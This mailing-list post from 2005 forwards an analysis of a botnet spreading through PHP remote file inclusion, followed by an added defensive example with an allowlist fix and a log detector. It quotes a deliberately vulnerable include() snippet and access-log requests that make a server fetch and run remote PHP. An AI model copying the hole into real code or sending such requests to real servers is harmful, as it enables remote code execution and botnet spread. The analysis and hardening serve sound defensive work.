[Dshield] [Fwd: Re:Destructive botnet originating from Japan]

Chris Brenton cbrenton at chrisbrenton.org
Sat Dec 24 10:46:34 GMT 2005


And the follow up that includes the point of infection. This was covered
in the diary a few days ago.


Chris

-------- Forwarded Message --------
> From: Barrett G. Lyon <blyon at prolexic.com>
> To: nanog at merit.edu
> Subject: Re:Destructive botnet originating from Japan
> Date: Fri, 23 Dec 2005 16:20:00 -0800
> 
> Well, it appears that bad code always seems to be the root of problems.
> According to our research today, the problem appears to be caused by
> incorrectly written PHP applications that perform includes using a string
> without running any validation against the string:
> 
> index.php?test=test
> <?php
> // Vulnerable: the request's "test" value is used unchecked in include()
> $test = $_GET['test'];
> include("$test.php");
> 
> When the include executes, the test string passed from the GET
> includes execution instructions:
> 
>        "GET /index.php?test=http%3A//210.170.60.2/....? HTTP/1.0" 200  
> 8010 "-" "Wget/1.6"
> 
> It appears that the attacker at 210.170.60.2 (also the botnet hosting  
> IRC server) is spreading his code as the include is called, pulling  
> and executing PHP code from a remote server that injects the software.
> 
> I'm not sure if this needs to be alerted to anyone outside of this  
> list, but it's pretty nasty.
> 
> 
> -Barrett

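The include pattern Barrett describes, as an added example that is not part of the forwarded message or of any project's code: the vulnerable form beside a hardened version that resolves the request value against a fixed allowlist of local page names, plus a small check that flags access-log lines whose query values begin with a URL scheme, the shape of the request quoted above. The page names, the allowlist, the `pages/` directory layout and the sample log lines (using documentation-range IPs) are constructed assumptions.

```php
<?php
// Added example (not from the forwarded message). Allowlist, paths and
// sample log lines below are constructed for illustration.

// --- Vulnerable form, as quoted in the post: the request decides which
// file PHP loads. With remote fopen wrappers enabled for include
// (allow_url_fopen in PHP 4/5.1; allow_url_include from PHP 5.2 on),
// "$test.php" may be a URL and the server executes whatever comes back.
function include_page_vulnerable(string $test): void
{
    include("$test.php");
}

// --- Hardened form: map the request value to one of a fixed set of local
// files. The raw string never reaches include().
const PAGES = ['home', 'about', 'contact'];   // constructed allowlist

function resolve_page(string $requested): ?string
{
    // Plain names only: no scheme, slash, dot or NUL can pass this pattern.
    if (!preg_match('~^[a-z0-9_]{1,32}$~', $requested)) {
        return null;
    }
    if (!in_array($requested, PAGES, true)) {
        return null;
    }
    return __DIR__ . '/pages/' . $requested . '.php';
}

function include_page_safe(string $requested): bool
{
    $path = resolve_page($requested);
    if ($path === null || !is_file($path)) {
        http_response_code(404);
        return false;
    }
    include $path;
    return true;
}

// --- Detection: flag a combined-format access-log line whose query string
// carries a value starting with "scheme://", which is what the quoted
// "test=http%3A//..." request looks like after URL decoding.
function query_has_remote_url(string $log_line): bool
{
    if (!preg_match('~"(?:GET|POST|HEAD) (\S+) HTTP/[0-9.]+"~', $log_line, $m)) {
        return false;
    }
    $qpos = strpos($m[1], '?');
    if ($qpos === false) {
        return false;
    }
    parse_str(substr($m[1], $qpos + 1), $params);   // also URL-decodes %3A -> ':'
    foreach ($params as $value) {
        if (is_string($value) && preg_match('~^\s*[a-z][a-z0-9+.\-]*://~i', $value)) {
            return true;
        }
    }
    return false;
}

// Demo: what the resolver does with a normal page name and with a URL.
foreach (['about', 'http://203.0.113.5/x.txt?', 'nosuchpage'] as $req) {
    echo str_pad($req, 28) . ' -> ' . var_export(resolve_page($req), true) . "\n";
}

// Constructed sample lines modelled on the one in the post (placeholder IPs).
$samples = [
    '192.0.2.10 - - [23/Dec/2005:16:20:00 -0800] "GET /index.php?test=http%3A//203.0.113.5/x.txt? HTTP/1.0" 200 8010 "-" "Wget/1.6"',
    '192.0.2.11 - - [23/Dec/2005:16:21:00 -0800] "GET /index.php?test=about HTTP/1.1" 200 1234 "-" "Mozilla/5.0"',
];
foreach ($samples as $line) {
    echo (query_has_remote_url($line) ? 'SUSPECT ' : 'ok      ') . $line . "\n";
}
```

The allowlist approach is deliberately stricter than "reject URLs": any value that is not one of the known page names is refused, so the fix does not depend on enumerating wrapper schemes. The log check is a coarse first filter; in practice you would also turn off remote include wrappers in php.ini and treat any hit as a reason to review that host's PHP for the same pattern.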